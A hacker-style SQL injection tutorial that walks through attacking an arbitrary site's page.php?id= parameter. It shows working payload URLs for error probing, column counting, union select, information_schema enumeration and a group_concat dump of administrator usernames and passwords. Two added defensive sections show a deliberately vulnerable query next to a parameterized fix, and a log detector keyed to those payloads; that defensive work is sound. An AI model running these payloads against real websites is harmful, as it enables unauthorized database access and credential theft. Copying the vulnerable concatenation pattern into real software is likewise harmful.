SQL injection Tutorial
1. A text editor of choice. (Using a pen and paper would take too long).
2. A vulnerable site. (How to find this is not my job).
3. Brains.
If you run Firefox, install the HackBar add-on. It will ease your life in SQL injection and XSS for sure! Google it.
1. Checking for a vulnerability.
Checking whether a link is vulnerable is rather easy.
It's mostly finding the vulnerable one that is the problem.
How to check this: append a single quote (') to the link.
First of all you need a link like the one below.
Anything with an id (or almost any other parameter) after the .php? and after the = can be tested.
This is because we know it selects something from the database, so this might be an entry point.
http://www.[site].com/page.php?id=1 <–
http://www.[site].com/page.php?id=1‘
If a MySQL error occurs, then the page is most likely vulnerable to SQL injection.
Example of a MySQL error:
Check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
Now that we know we have a vulnerable link in front of us, let's move on.
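Why the single-quote test works, as an added example that is not part of the original tutorial: the backend pastes the id straight into the SQL text, so a quote in the input unbalances the statement and the database throws the error shown above. The same lookup with a bound parameter treats the quote as data. SQLite stands in for MySQL here, and the table, column and function names are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the page.php backend (SQLite here, MySQL in the tutorial;
# the quote handling that the single-quote test relies on behaves the same way).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "home"), (2, "about")])
    return conn

def vulnerable_lookup(conn, page_id):
    """The pattern behind page.php?id=...: the parameter is concatenated into the SQL
    text, so a quote in the input becomes a quote in the statement."""
    sql = "SELECT title FROM pages WHERE id = '" + page_id + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # This is the database error the tutorial's single-quote test is looking for.
        return "ERROR: " + str(exc)

def safe_lookup(conn, page_id):
    """Hardened form: the value travels as a bound parameter and is never parsed as SQL.
    A quote in the input is just a character that matches no row."""
    return conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for raw in ("1", "1'"):
        print(repr(raw), "vulnerable ->", vulnerable_lookup(db, raw))
        print(repr(raw), "safe       ->", safe_lookup(db, raw))
```

Note that hiding the error text from the page removes the signal the quote test relies on but does not fix the bug; only the bound parameter does.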
2. Get the column count.
We need to get the column count in order to successfully SQL inject our target.
http://www.[site].com/page.php?id=1+order+by+1– [no error]
http://www.[site].com/page.php?id=1+order+by+100– [no error]
Why do I do order by 100? This way we can determine whether we need to use string injection.
If you do not get an error when you use order+by+100–, we need to force an error.
How do we do this? Take a close look.
http://www.[site].com/page.php?id=1‘+order+by+100–+-
I added a single quote behind the id number and +- at the end of the line.
Now that our input is executed as a string, we should finally get an error.
[If you already get an error without the single quote, at 100 and at 5, proceed without the quote.]
http://www.[site].com/page.php?id=1’+order+by+1–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+99–+- [error]
http://www.[site].com/page.php?id=1’+order+by+2–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+3–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+4–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+5–+- [error]
At this point we know one important thing: the vulnerable web page has 4 columns,
because we got an error saying Unknown column '5' in 'order clause'
when we executed order+by+5–+-.
We are about to need this in our next step.
3. Union Select statement.
Union select is a basic SQL injection method, and also the most common one.
UNION joins two queries: the site's own query (the one selecting the id or whatever we are injecting into)
and ours, the query we use to inject the web page.
As follows:
http://www.[site].com/page.php?id=1’+union+select+1,2,3,4–+-
Now look at the content of the site, and at the source if you don't see any random numbers popping up.
If they do show up, those are the returned vulnerable columns, the ones we need to inject our queries into.
For me 2 and 4 were returned in the web content, meaning those are the vulnerable columns.
We now need to get the version of the SQL database the server is running. If it's 5 or higher it's easy.
If it's 4 or below it's a long workaround. I will be explaining version 4 and lower in one of my next tutorials.
Let's ask for version() in our first vulnerable column, which was 2.
http://www.[site].com/page.php?id=1’+union+select+1,version(),3,4–+-
Now if the first way of asking for the version did not work, you can always try @@version:
http://www.[site].com/page.php?id=1’+union+select+1,@@version,3,4–+-
Now, where the number 2 previously popped up, the version we requested will show up instead.
We always want it to be 5.x.x or higher!
Let's say mine is 5.2.91. Let's get on: we need the database name of that website for later on in our injection.
4. Select database name:
You can simply add your query in another vulnerable column or edit the one you are already using:
http://www.[site].com/page.php?id=1’+union+select+1,version(),3,database()–+-
Another way to find the database name:
http://www.[site].com/page.php?id=1’+union+select+1,@@version,3,group_concat(database())–+-
Well, we all know that in most cases one server has more than one database. You can check this with the following query.
You won't be needing this a lot though.
http://www.[site].com/page.php?id=1’+union+select+1,group_concat(schema_name),3,4+from+information_schema.schemata–+-
My database is called Database_1, no quotes (it pops up where my vulnerable column shows).
Let's move on.
5. Selecting the table names.
Stay tuned it’s getting more advanced here!
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()–+-
Wow, that's a hell of a line! Let's clear that up for you.
group_concat is a function whose result has a maximum length of 1024 characters (by default), so it will return 1024 characters at most.
We use it because there can be a hell of a lot of tables and columns; this eases our work.
So it says that group_concat selects table names from information_schema (which is a database).
Extra hint: do not copy-paste the queries; that way you won't understand them.
As I said, the group_concat result has a maximum length of 1024
characters, and if there are more tables or columns we need to get those too
in some cases.
If we want to find all tables, you can do this manually using only concat() and adding a limit at the end of our query.
http://www.[site].com/page.php?id=1+union+select+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()+limit+0,1–+-
Keep increasing that limit until you have all tables:
0,1 | 1,1 | 2,1 | 3,1 | 4,1 | 5,1 | 6,1 | 7,1 | 8,1 | 9,1 | 0,2 and so on.
Now we have all our tables. Oh noes, what to look for??
We simply select what we think is interesting.
Look for names like:
administrator(s), member(s)
User(s), admin(s)
tbladmin(s),tblmember(s)
Anything you think refers to a login or an admin login.
Of course some bad-ass black hats would also look for payment stuff (I
do not support black hatting); that's why I won't add them in line.
Let's say I have an administrator table and we need to move on to getting the columns!!
6. Selecting the column names.
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=”administrator”–+-
Take a close look at the query; it looks very similar. You only need
to change group_concat(table_name) to group_concat(column_name) and
.tables to .columns.
At the end of the line change table_schema to table_name and database() to "administrator", which we found before.
You could use the limit at the end here ("limit+0,1–") to find all the columns if needed.
If you get an error, this is not a bad thing; let's use some magic fingers to fix it.
It is because the URL does not accept "administrator" as valid. We can fix this using hex.
http://www.swingnote.com/tools/texttohex.php
Where the website says "Hello to my little friend", that is where I paste administrator.
Below, all the hex values will appear.
Choose this one: 61646d696e6973747261746f72 (administrator)
Add 0x before those numbers. That way the database knows it's hex and can translate it.
How to add it to a link: where you now have table_name="administrator"–+-
at the end of your link, change it to table_name=0x61646d696e6973747261746f72–+-
Entire vector:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f72–+-
Now all the column names should have shown up where your vulnerable column is.
Look for username and password or whatever relates. I have user and pass inside my list of columns.
I'll use those as an example. This is the interesting part, isn't it? Did I finally get your full attention?
We change group_concat(column_name) to group_concat(user,0x3a,pass). The 0x3a is important in this part:
it is the hex for a colon in SQL statements, and together these give user 1
and pass 1, user 2 and pass 2. If we did not use it, it would be a mess.
At the end: +from+database_1.administrator
database_1 is the database we found at the start.
As follows:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(user,0x3a,pass),3,4+from+db_1.administrator–+-
This time we do not need hex for administrator.
I won't be explaining how to crack passwords.
This is purely for educational purposes, not for causing harm.
If everything went well, you should now have the admin name and password.
Of course, that was only basic union and string SQL injection.
There is a lot more. So much that it even hurts my brain.
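From the defender's side, steps 1 to 6 above leave a very recognisable trail in the web server access log: a stray quote, order by probes, union select, information_schema lookups, group_concat and 0x hex literals, all from one client in a few minutes. The detector below, an added example that is not part of the original tutorial, fingerprints each stage in the decoded request path and reports clients that walk through several of them. The log lines, IP addresses and stage names are constructed for the example; the payload shapes are those from the steps above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Each step of the tutorial leaves a distinctive token in the decoded query string.
STAGES = [
    ("quote_probe",  re.compile(r"'(\s*$|\s*(--|#)|\s+\w)")),           # id=1'  /  1' order by
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum",  re.compile(r"\binformation_schema\.\w+", re.I)),
    ("data_dump",    re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("hex_literal",  re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),          # 0x61646d... for quoted names
]
# Apache/nginx combined log format: client IP, timestamp, request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(raw_path):
    """Return the tutorial stages whose fingerprint appears in one request path."""
    path = unquote_plus(raw_path)          # %27 -> ', + -> space, as the database would see it
    return [name for name, rx in STAGES if rx.search(path)]

def detect(lines):
    """Map client IP -> ordered, de-duplicated list of injection stages observed."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        for stage in classify(path):
            if stage not in seen[ip]:
                seen[ip].append(stage)
    return dict(seen)

def escalating(lines, min_stages=3):
    """IPs that walked through at least min_stages steps: enumeration, not a stray quote."""
    return sorted(ip for ip, stages in detect(lines).items() if len(stages) >= min_stages)

# Constructed sample log: one client replaying the tutorial's steps, one normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 311
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /page.php?id=1%27+order+by+5--+- HTTP/1.1" 500 311
203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /page.php?id=1%27+union+select+1,2,3,4--+- HTTP/1.1" 200 5200
203.0.113.7 - - [10/Oct/2023:13:57:10 +0000] "GET /page.php?id=1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--+- HTTP/1.1" 200 5300
203.0.113.7 - - [10/Oct/2023:13:58:05 +0000] "GET /page.php?id=1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f72--+- HTTP/1.1" 200 5300
198.51.100.2 - - [10/Oct/2023:13:58:00 +0000] "GET /page.php?id=2 HTTP/1.1" 200 5100
""".splitlines()
```

A single quote_probe hit on its own is weak (apostrophes occur in legitimate input), which is why escalating() only reports clients that progressed through several stages.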